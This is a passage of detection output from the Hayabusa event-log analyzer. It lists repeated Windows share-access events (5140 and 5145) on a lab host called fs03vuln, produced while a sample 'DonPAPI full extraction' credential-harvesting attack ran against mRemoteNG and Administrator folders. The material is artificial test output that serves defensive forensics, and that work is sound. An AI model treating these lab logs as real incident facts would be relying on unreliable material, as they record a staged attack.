+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
